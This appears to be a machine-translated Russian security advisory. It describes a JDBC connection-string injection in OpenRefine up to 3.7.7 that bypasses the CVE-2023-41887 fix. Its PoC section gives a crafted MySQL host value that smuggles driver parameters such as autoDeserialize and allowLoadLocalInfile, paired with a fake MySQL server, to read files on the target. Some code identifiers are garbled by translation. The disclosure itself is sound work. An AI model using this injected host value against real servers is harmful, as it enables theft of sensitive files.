Description
### Краткое описание Уязвимость для атаки jdbc существует в OpenRefine(версия<=3.7.7)### Подробности#### Повторение уязвимости начинается с создания вредоносного сервера MySQL (здесь используется проект MySQL_Fake_SErver с открытым исходным кодом).![image](https://user-images.githubusercontent.com/31120718/296241211-96c6a647-8572-4859-837d-dac3d3f52ab0.png) Затем перейдите к уязвимости, вызывающей подключение к Jdbc![image](https://user-images.githubusercontent.com/31120718/296241309-af2c404d-0651-4d4b-86d6-8111cef0295b.png)### # Анализ уязвимостей Эта уязвимость является обходом исправления уязвимости `CVE-2023-41887`, основным принципом уязвимости на самом деле является использование функций официального синтаксиса, как показано на следующем рисунке, при подключении мы можем выполнить настройку параметров в хост-части![image](https://user-images.githubusercontent.com/31120718/296241439-db45840c-e3bd-4047-b1ac-499f7aeb4848.png) В `com.google.уточнить.расширение.базы данных.mysql.Метод MySQLConnectionManager#getConnection` в окончательной структуре jdbcUrl![image](https://user-images.githubusercontent.com/31120718/296241473-fc63b0a9-6ecf-47a0-ac7d-d68d833c7c27.png) То есть, в вызове метода `toURI` здесь вы можете видеть, что хост-часть напрямую объединяется для любой проверки, которую можно обойти, используя функцию адреса в mysql![image](https://user-images.githubusercontent.com/31120718/296241511-e27ba08c-500a-4ed5-b662-96e5e4a8af5f.png) То есть, в вызове метода toURI здесь вы можете видеть, что хост-часть напрямую объединяется для любой проверки, которую можно обойти, используя функцию адреса mysql![image](https://user-images.githubusercontent.com/31120718/296241733-83d6d0a5-197c-4bcf-835e-0c54b4b8b80f.png)## # PoC_Complete инструкции, включая конкретные сведения о конфигурации, для воспроизведения уязвимости._``Тип: MySQLHost: 127.0.0.1:3306,(host=127.0.0.1,port=3306,autoDeserialize=true,allowLoadLocalInfile=true,allowUrlInLocalInfile=true,allowLoadLocalInfileInPath=true),127.0.0.1Port : 3306User: win_hostsDatabase: тест``### Влияние из-за новой библиотеки драйверов MySQL в в последней версии OpenRefine (8.0.30) отсутствует связанная точка использования десериализации, поэтому выполнение исходного кода невозможно, но злоумышленники могут использовать эту уязвимость для чтения конфиденциальных файлов на целевом сервере.